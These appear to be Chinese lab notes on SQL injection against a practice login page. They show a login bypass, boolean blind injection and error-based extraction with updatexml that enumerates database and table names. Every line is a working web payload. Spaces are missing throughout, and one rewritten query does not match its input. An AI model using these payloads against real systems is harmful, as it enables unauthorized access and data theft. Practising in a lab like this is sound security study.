账号密码登录界面

后台代码：

SELECTusername,passwordFROMusersWHEREusername='$uname'andpassword='$passwd'LIMIT0,1

输入账号：Dumb密码：Dumb2

SELECTusername,passwordFROMusersWHEREusername='Dumb'andpassword='Dumb2'LIMIT0,1

绕过登录：

输入账号：aaa密码：1'or1=1#

SELECTusername,passwordFROMusersWHEREusername='aaa'andpassword='1'or1=1#'LIMIT0,1

Sql注入1：盲注

输入账号：Dumb密码：Dumb'andlength(database())=8#

SELECTusername,passwordFROMusersWHEREusername='Dumb'andpassword='Dumb'andlength(database())=8#'LIMIT0,1

security

输入账号：Dumb密码：Dumb'andascii(substr(database(),1,1))=115#

SELECTusername,passwordFROMusersWHEREusername='Dumb'andpassword='Dumb'andascii(substr(database(),2,1))=115#LIMIT0,1

Sql注入2：报错

输入账号：aaa密码：aaa'andupdatexml(1,concat(0x23,database()),1)#

SELECTusername,passwordFROMusersWHEREusername='aaa'andpassword='aaa'andupdatexml(1,concat(0x23,database()),1)#'LIMIT0,1

输入账号：aaa密码：aaa'andupdatexml(1,concat(0x23,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='security')),1)#